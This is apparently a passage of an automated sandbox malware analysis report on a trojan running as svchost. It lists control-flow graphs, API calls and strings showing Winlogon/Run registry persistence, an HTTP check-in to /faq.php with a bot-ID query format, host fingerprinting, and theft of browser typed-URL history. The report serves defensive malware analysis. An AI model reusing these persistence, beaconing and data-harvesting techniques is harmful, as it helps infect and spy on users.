                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                                • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 2213373080-1283825033
                                                                                                                                                                                                                • Opcode ID: 692c2a2545630316ff01fe9079b73210f8e7856b0d2e88de19c5b7b8452456d0
                                                                                                                                                                                                                • Instruction ID: bc7823705d18769c5faeb1225f25d90b55e32e5419ac8f3409ebfff5f48eac53
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 692c2a2545630316ff01fe9079b73210f8e7856b0d2e88de19c5b7b8452456d0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2871DC71A40346FBEB308B749C99FBAB76DEF44744F604588FA41EB180DBB19905DBA0
                                                                                                                                                                                                                Function 02BC6970 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 261memorysleepfileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1010 2bc6970-2bc69a3 memset call 2bb32e0 1013 2bc69a6-2bc69ab 1010->1013 1013->1013 1014 2bc69ad-2bc69b7 1013->1014 1015 2bc69bd-2bc69d9 GetProcessHeap HeapAlloc 1014->1015 1016 2bc6c8f-2bc6c92 1014->1016 1017 2bc6c8e 1015->1017 1018 2bc69df-2bc69f2 memset GetTimeZoneInformation 1015->1018 1017->1016 1019 2bc69f8-2bc69ff call 2bc4f80 1018->1019 1022 2bc6a15-2bc6a23 1019->1022 1023 2bc6a01-2bc6a13 Sleep call 2bc4f80 1019->1023 1025 2bc6a2c-2bc6a3b IsUserAnAdmin 1022->1025 1026 2bc6a25 1022->1026 1023->1022 1028 2bc6a3d 1025->1028 1029 2bc6a44-2bc6afa GetTickCount call 2bd5850 _snprintf GetTempPathA GetTempFileNameA SetFileAttributesA DeleteFileA 1025->1029 1026->1025 1028->1029 1032 2bc6b00-2bc6b05 1029->1032 1032->1032 1033 2bc6b07-2bc6b1e call 2bb6c70 1032->1033 1036 2bc6b89-2bc6ba8 call 2bc4ab0 1033->1036 1037 2bc6b20-2bc6b22 1033->1037 1043 2bc6bca-2bc6bdd call 2bb74a0 1036->1043 1044 2bc6baa-2bc6bc8 call 2bc4ab0 1036->1044 1039 2bc6b2e-2bc6b30 1037->1039 1040 2bc6b24-2bc6b2c 1037->1040 1042 2bc6b32-2bc6b36 1039->1042 1040->1036 1045 2bc6b38-2bc6b3a 1042->1045 1046 2bc6b52-2bc6b54 1042->1046 1060 2bc6bdf-2bc6bf8 call 2bc5ba0 GetProcessHeap HeapValidate 1043->1060 1061 2bc6c06-2bc6c22 SetFileAttributesA DeleteFileA 1043->1061 1044->1043 1059 2bc6c24-2bc6c2b call 2bc4f80 1044->1059 1049 2bc6b3c-2bc6b42 1045->1049 1050 2bc6b4e-2bc6b50 1045->1050 1051 2bc6b57-2bc6b59 1046->1051 1049->1046 1054 2bc6b44-2bc6b4c 1049->1054 1050->1051 1055 2bc6b5b-2bc6b6f GetProcessHeap HeapValidate 1051->1055 1056 2bc6b86 1051->1056 1054->1042 1054->1050 1057 2bc6b7d-2bc6b80 1055->1057 1058 2bc6b71-2bc6b77 GetProcessHeap HeapFree 1055->1058 1056->1036 1057->1056 1058->1057 1062 2bc6c32-2bc6c46 call 2bc5af0 call 2bb3420 1059->1062 1068 2bc6c2d call 2bb6de0 1059->1068 1060->1061 1070 2bc6bfa-2bc6c00 GetProcessHeap HeapFree 1060->1070 1061->1062 1074 2bc6c48-2bc6c5b 1062->1074 1075 2bc6c82-2bc6c89 Sleep 1062->1075 1068->1062 1070->1061 1076 2bc6c60-2bc6c67 Sleep call 2bb3420 1074->1076 1075->1019 1078 2bc6c6c-2bc6c6e 1076->1078 1078->1019 1079 2bc6c74-2bc6c7b 1078->1079 1079->1076 1080 2bc6c7d 1079->1080 1080->1019
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC6991
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02BC69C7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02BC69CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC69E3
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC69F2
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02BC6A06
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC6A2C
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC6A6A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC6AA6
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 02BC6ABB
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BC6AD3
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC6AE2
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC6AEF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B64
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC6B67
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B74
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC6B77
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02BC6BED
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC6BF0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6BFD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC6C00
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02BC6C0F
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC6C1C
                                                                                                                                                                                                                • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02BF96FC,00000001), ref: 02BC6C61
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                                • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                                • API String ID: 889229162-4291654836
                                                                                                                                                                                                                • Opcode ID: 704f1f2dad66a5bbbee13882cbec9dc70b20d4ad64cb246d7ec68dae65accf50
                                                                                                                                                                                                                • Instruction ID: c17f44b944a2d28183354281b772f600a0497eb94dbbea9795c698af44d00c8a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 704f1f2dad66a5bbbee13882cbec9dc70b20d4ad64cb246d7ec68dae65accf50
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44810571E80219ABDB649B748D49FEB7B7DEF84340F5446D8FA05EB180EB709944CBA0
                                                                                                                                                                                                                Function 02BB6690 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 260memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1081 2bb6690-2bb66d0 memset call 2bc4ab0 1084 2bb66ee-2bb66fe call 2bb74a0 1081->1084 1085 2bb66d2-2bb66e1 call 2bc4ab0 1081->1085 1090 2bb6949-2bb6952 PathFileExistsA 1084->1090 1091 2bb6704-2bb671b calloc * 2 1084->1091 1088 2bb66e6-2bb66e8 1085->1088 1088->1084 1088->1090 1092 2bb6968-2bb696f 1090->1092 1093 2bb6954-2bb6956 1090->1093 1094 2bb671d-2bb671f exit 1091->1094 1095 2bb6725-2bb6730 calloc 1091->1095 1093->1092 1098 2bb6958-2bb6962 SetFileAttributesA DeleteFileA 1093->1098 1094->1095 1096 2bb673a-2bb6758 calloc 1095->1096 1097 2bb6732-2bb6734 exit 1095->1097 1099 2bb675a-2bb675c exit 1096->1099 1100 2bb6762-2bb676d calloc 1096->1100 1097->1096 1098->1092 1099->1100 1101 2bb676f-2bb6771 exit 1100->1101 1102 2bb6777-2bb679d calloc 1100->1102 1101->1102 1103 2bb679f-2bb67a1 exit 1102->1103 1104 2bb67a7-2bb67b2 calloc 1102->1104 1103->1104 1105 2bb67bc-2bb67e2 calloc 1104->1105 1106 2bb67b4-2bb67b6 exit 1104->1106 1107 2bb67ec-2bb67fb calloc 1105->1107 1108 2bb67e4-2bb67e6 exit 1105->1108 1106->1105 1109 2bb67fd-2bb67ff exit 1107->1109 1110 2bb6805-2bb6856 call 2bb1990 * 3 call 2bb1a00 1107->1110 1108->1107 1109->1110 1119 2bb6858-2bb6860 1110->1119 1119->1119 1120 2bb6862-2bb687b _strrev 1119->1120 1121 2bb6880-2bb6885 1120->1121 1121->1121 1122 2bb6887-2bb6896 1121->1122 1123 2bb6898-2bb689c 1122->1123 1124 2bb68ac-2bb68ae 1122->1124 1125 2bb689e-2bb68aa 1123->1125 1126 2bb68b0-2bb68b8 1123->1126 1124->1126 1127 2bb68f3 1124->1127 1125->1123 1125->1124 1129 2bb68eb-2bb68f1 1126->1129 1130 2bb68ba-2bb68bd 1126->1130 1128 2bb68f5-2bb6937 call 2bb1840 * 4 GetProcessHeap HeapValidate 1127->1128 1144 2bb6939-2bb693f GetProcessHeap RtlFreeHeap 1128->1144 1145 2bb6945-2bb6948 1128->1145 1129->1128 1130->1127 1131 2bb68bf-2bb68c9 1130->1131 1131->1129 1133 2bb68cb-2bb68ce 1131->1133 1133->1127 1135 2bb68d0-2bb68da 1133->1135 1135->1129 1137 2bb68dc-2bb68df 1135->1137 1137->1127 1139 2bb68e1-2bb68e9 1137->1139 1139->1129 1144->1145 1145->1090
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02BC4B5D
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67A1
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67AB
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67B6
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67D9
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67E6
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67F0
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67FF
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                                • _strrev.MSVCRT ref: 02BB6869
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02BB692C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB692F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB693C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 02BB693F
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02BB694A
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02BB695B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,?), ref: 02BB6962
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 10001, xrefs: 02BB682A
                                                                                                                                                                                                                • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02BB680D
                                                                                                                                                                                                                • /login.php, xrefs: 02BB66C1, 02BB66D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                                • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                                • API String ID: 1958765476-2761129557
                                                                                                                                                                                                                • Opcode ID: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                                • Instruction ID: 4a33a5fe97b78c557e9bada39f6e69b6f5c3d1afbcbd5257d7ceb6dc13f95c6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58811470E40315ABEB229F788C45BFA7FA8EF05745F044499FB45AB181D7F1A9448BE0
                                                                                                                                                                                                                Function 02BB30E0 Relevance: 47.4, APIs: 19, Strings: 8, Instructions: 185memoryregistryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 1146 2bb30e0-2bb311a memset call 2bd4ff0 1149 2bb3120-2bb312d call 2bd50f0 1146->1149 1150 2bb32d7-2bb32de 1146->1150 1153 2bb3133-2bb3170 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA 1149->1153 1154 2bb3285-2bb329b GetProcessHeap HeapValidate 1149->1154 1155 2bb3179-2bb3196 RegOpenKeyExA 1153->1155 1156 2bb3172 1153->1156 1157 2bb329d-2bb32a6 GetProcessHeap HeapFree 1154->1157 1158 2bb32ac-2bb32b1 1154->1158 1159 2bb3198-2bb31b9 RegQueryValueExA RegCloseKey 1155->1159 1160 2bb31bf-2bb31c4 1155->1160 1156->1155 1157->1158 1161 2bb32ce-2bb32d6 1158->1161 1162 2bb32b3-2bb32bd GetProcessHeap HeapValidate 1158->1162 1159->1160 1163 2bb31c9-2bb31d5 1160->1163 1164 2bb31c6 1160->1164 1162->1161 1165 2bb32bf-2bb32c8 GetProcessHeap HeapFree 1162->1165 1166 2bb31de-2bb31e1 CharUpperA 1163->1166 1167 2bb31d7-2bb31dc 1163->1167 1164->1163 1165->1161 1168 2bb31e3-2bb320d CharUpperA _snprintf 1166->1168 1167->1168 1169 2bb3210-2bb3215 1168->1169 1169->1169 1170 2bb3217-2bb3219 1169->1170 1171 2bb321b 1170->1171 1172 2bb327d-2bb3280 1170->1172 1173 2bb3220-2bb3225 1171->1173 1172->1154 1174 2bb3226-2bb322c 1173->1174 1174->1174 1175 2bb322e-2bb323d 1174->1175 1176 2bb3240-2bb3245 1175->1176 1176->1176 1177 2bb3247-2bb326d _snprintf 1176->1177 1178 2bb3270-2bb3275 1177->1178 1178->1178 1179 2bb3277-2bb327b 1178->1179 1179->1172 1179->1173
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB3106
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,75572F70,00000000), ref: 02BB3144
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?,?,?,75572F70,00000000), ref: 02BB3151
                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,75572F70,00000000), ref: 02BB3168
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,75572F70,00000000), ref: 02BB318E
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,75572F70,00000000), ref: 02BB31AF
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,75572F70,00000000), ref: 02BB31B9
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,75572F70,00000000), ref: 02BB31DF
                                                                                                                                                                                                                • CharUpperA.USER32(00000000,?,?,?,75572F70,00000000), ref: 02BB31E8
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB3201
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB325F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,75572F70,00000000), ref: 02BB328E
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB3297
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,02BC6E07,?,?,75572F70,00000000), ref: 02BB32A3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32A6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,00000000), ref: 02BB32B6
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32B9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75572F70,00000000), ref: 02BB32C5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75572F70,00000000), ref: 02BB32C8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$memset$Name$AllocCharComputerErrorFreeLastUpperUserValidate_snprintflstrcpyn$BackslashCloseEnvironmentInformationOpenPathQueryValueVariableVolume
                                                                                                                                                                                                                • String ID: %02X$%53%59%53%54%45%4D%21%31%31%34%31%32%37%21%30%32%39%36%43%44%43%30$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!114127!0296CDC0$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                                • API String ID: 2057876665-3677104015
                                                                                                                                                                                                                • Opcode ID: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                                • Instruction ID: 158ab4a0c10846fc958ccc3d6e6da7cd483fd8fc3d3daaaabb5894d9a012793b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD51B371E00215ABEB609BA99C89FFBBBFCEF84740F4445C5FB45E7140E6B099048BA0
                                                                                                                                                                                                                Function 02BB4900 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 178fileregistryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02BB4925
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB494D
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,75573490), ref: 02BB4987
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49A9
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49B5
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,IE history:,0000000C,02BB58F1,00000000), ref: 02BB49C9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02BB49D7
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB49EB
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB49F7
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5C1C,00000001,00000000,00000000), ref: 02BB4A0B
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02BB4A19
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A43
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB4A4F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02BB4A64
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB4A74
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB4A88
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4A94
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,02BF5B88,00000002,00000000,00000000), ref: 02BB4AA8
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02BB4AB6
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB4AD5
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB4AEC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
